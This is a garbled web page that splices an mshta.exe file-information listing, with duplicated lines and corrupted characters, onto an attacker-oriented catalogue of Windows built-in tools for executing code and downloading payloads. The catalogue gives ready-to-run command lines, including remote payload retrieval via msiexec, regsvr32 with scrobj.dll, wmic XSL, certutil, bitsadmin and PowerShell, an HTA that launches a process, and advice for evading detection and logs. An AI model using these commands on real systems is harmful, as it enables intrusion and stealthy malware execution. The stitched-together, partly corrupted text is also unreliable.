Description: Command-line tool that registers dll files as command components in the registry. Notable for its use to bypass UAC and useful as it supports remote DLL retrieval with scrobj.dll. No arguments need to be supplied to regsvr32 if the dll exports the function DllRegisterServer. Example: regsvr32 /s /n /u /i:URL scrobj.dll. Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum kernelmode.info about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code. I found it funny that we can execute some JavaScript.
Mshta.exe file information
The process known as Microsoft速 HTML Application host or Microsoft速 HTML-programvert or ab0bb9e3b144cac60965e5440a4ee583 belongs to software Internet Explorer or Windows Internet Explorer or Microsoft Windows Operating System or ab0bb9e3b144cac60965e5440a4ee583 by Microsoft (www.microsoft.com) or SWIS.
Description: Mshta.exe is an important part of Windows, but often causes problems. Mshta.exe is located in the C:WindowsSystem32 folder or sometimes in a subfolder of C: or in a subfolder of 'C:Program Files'.Known file sizes on Windows 10/8/7/XP are 13,312 bytes (57% of all occurrences), 45,568 bytes and 6 more variants.
Mshta.exe is a Windows system file. The file is a trustworthy file from Microsoft. The program has no visible window.Therefore the technical security rating is 4% dangerous; however you should also read the user reviews.
Mshta.exe is a Windows system file. The file is a trustworthy file from Microsoft. The program has no visible window.Therefore the technical security rating is 4% dangerous; however you should also read the user reviews.
Uninstalling this variant:In case of any problems with mshta.exe, you can uninstall the software Tweak UI using the Uninstall a Program function of Windows Control Panel (Windows: Start, Settings, Control Panel, Uninstall a Program).
Recommended: Identify mshta.exe related errors
- If mshta.exe is located in a subfolder of C:Windows, the security rating is 2% dangerous. The file size is 13,312 bytes (68% of all occurrences), 12,800 bytes, 47,104 bytes or 11,776 bytes.Mshta.exe is a Windows core system file. It is a trustworthy file from Microsoft.
- If mshta.exe is located in a subfolder of the user's profile folder, the security rating is 44% dangerous. The file size is 7,293,280 bytes (80% of all occurrences) or 29,184 bytes.It is not a Windows system file. The program is not visible. It is a Verisign signed file. The file has a digital signature. The process is loaded during the Windows boot process (see Registry key: Run, RunOnce, User Shell Folders).The program uses ports to connect to or from a LAN or the Internet.Mshta.exe is able to record keyboard and mouse inputs and monitor applications. Uninstalling this variant:In case of any problems with mshta.exe, you can uninstall the software TeamViewer using the Uninstall a Program function of Windows Control Panel (Windows: Start, Settings, Control Panel, Uninstall a Program) or visit the www.teamviewer.com website.
- If mshta.exe is located in the Windows folder for temporary files, the security rating is 26% dangerous. The file size is 458,829 bytes.
Important: Some malware disguises itself as mshta.exe, particularly when not located in the C:WindowsSystem32 folder. Therefore, you should check the mshta.exe process on your PC to see if it is a threat. We recommend Security Task Manager for verifying your computer's security. This was one of the Top Download Picks of The Washington Post and PC World.
As an attacker often your aim is to execute code on a target system while simultaneously avoiding detection.Luckily Windows provides many built in tools to help you execute code while leaving very little evidence behind.
A list of ways to execute code, including examples, are shown below. Note that UAC bypasses and DLL hijacking will not be included as these are covered elsewhere.
Also a much more comprehensive list can be found here - https://github.com/api0cradle/LOLBAS
General tips:
To remain hidden ideally you want to:
- Avoid creating new processes/network connections
- Avoid creating anomalous parent/child relationships
- Avoid creating/modifying files/registry entries
- Avoid creating memory anomalies
- Avoid leaving evidence in log files
If you are going to drop files, then drop utilities to help run code as opposed to dropping the payload itself.
References:
Microsoft command line reference:https://technet.microsoft.com/en-us/library/cc772390(v=ws.11).aspx
UAC Bypasses:https://github.com/hfiref0x/UACME
Code Execution Techniques:
- appsyncvpublishing.exe
- Description: This utility supports the ability to execute powershell making it an excellent alternative to Powershell.exe.
- Example: SyncAppvPublishingServer.exe 'n;calc'
- control.exe
- Description: The control panel feature within Windows supports the execution of arbitrary DLLs as demonstrated in the shadowbrokers release. (https://www.dearbytes.com/blog/playing-around-with-nsa-hacking-tools/)
- Example: control.exe payload.dll
- csc.exe
- Description: The .NET compiler can be used to compile a c# payload locally that can then be executed.
- Example: C:WindowsMicrosoft.NETFrameworkv2.0.50727csc.exe /out:payload.exe payload.cs
- Example payload.cs: public class x{public static void Main(){System.Diagnostics.Process.Start('calc');}}
- cscript.exe/wscript.exe
- Description: Windows script engines that support both VBS and JScript execution. CScript is the console version, WScript is the Window version. Neither version supports scripts being supplied on the command line, instead a file must be created containing the script or a funky bat file wrapper.
- Example: cscript.exe test.vbs (where test.vbs contains WScript.Echo 'test')
- forfiles.exe
- Description: Forfiles supports the ability to execute commands and seems to be equivalent to cmd.
- Example: forfiles /p c:windowssystem32 /m notepad.exe /c calc.exe
- msbuild.exe
- Description - Microsoft's build utility where you can supply an inline build task to execute code (https://msdn.microsoft.com/en-us/library/dd722601.aspx)
- Example: C:WindowsMicrosoft.NETFrameworkv2.0.50727msbuild.exe serverpayload
- msiexec.exe
- Description - The Windows installer typically used to install new software or patches. It be used to download and execute a remote payload.
- Example: msiexec /i http://server/package.msi
- Example: msiexec /y payload.dll
- Example: msiexec /z payload.dll
- mshta.exe
- Description: MSHTA can be used to execute HTA files (containing scripts) or directly execute VBScript/JScript from the command line.
- Example: mshta bad.hta
- Example: mshta vbscript:Execute('MsgBox('amessage',64,'atitle')(window.close)')
- Example: mshta javascript:alert('test');
- Example HTA: <html><HTA:APPLICATION icon='#' WINDOWSTATE='minimize' SHOWINTASKBAR='no' SYSMENU='no' CAPTION='no' /><script language='VBScript'>
Set objShell = CreateObject('Wscript.Shell')
objShell.Run 'calc.exe'
Close
</script></html>
- powershell.exe
- Description: The most well known and most useful attacker utility. Powershell can be operated in console mode, with commands provided on the command line or through passing a ps1 file containing commands.
- Example: powershell -c calc
- Example: powershell -exec bypass -File test.ps1
- regsvr32.exe
- Description: Command-line tool that registers dll files as command components in the registry. Notable for its use to bypass UAC and useful as it supports remote DLL retrieval with scrobj.dll. No arguments need to be supplied to regsvr32 if the dll exports the function DllRegisterServer.
- Example: regsvr32 /s /n /u /i:[URL] scrobj.dll
- Example: regsvr32 payload.dll
- rundll32.exe
- Description: Loads and runs DLLs. Three parameters are typically used, the DLL to be executed, the function within the DLL to call and any arguments.
- Example: rundll32 SHELL32.DLL,ShellExec_RunDLL 'calc'
- Example: rundll32.exe javascript:'..mshtml,RunHTMLApplication ';alert('test');
- winrm.exe
- Description: WinRM, or Windows Remote Management provides the ability to remotely execute wmi commands. The winrm service is disabled by default but can be enabled.
- Example: winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine='calc'}
- wmic.exe
- Description: Command line tool for WMI.
- Example: wmic process call create 'cmd.exe /c calc'
- Example: wmic /node:[targetIPaddr] /user:[admin] process call create 'cmd.exe /c [command]'
- Example: wmic os get /format:'https://server/payload.xsl'
Download Techniques:
- certutil.exe
- Description: Allows you to download a payload.
- Example: certutil -ping [URL]
- Example: certutil -urlcache -split -f [URL] [output-file]
- bitsadmin.exe
- Description: Allows you to download a payload.
- Example: bitsadmin /transfer [job-name] /download /priority normal [URL-to-payload] [output-path]
- powershell.exe
- Description: Allows you to download a payload.
- Example: powershell -c '(New-Object System.Net.WebClient).DownloadString('https://google.com')'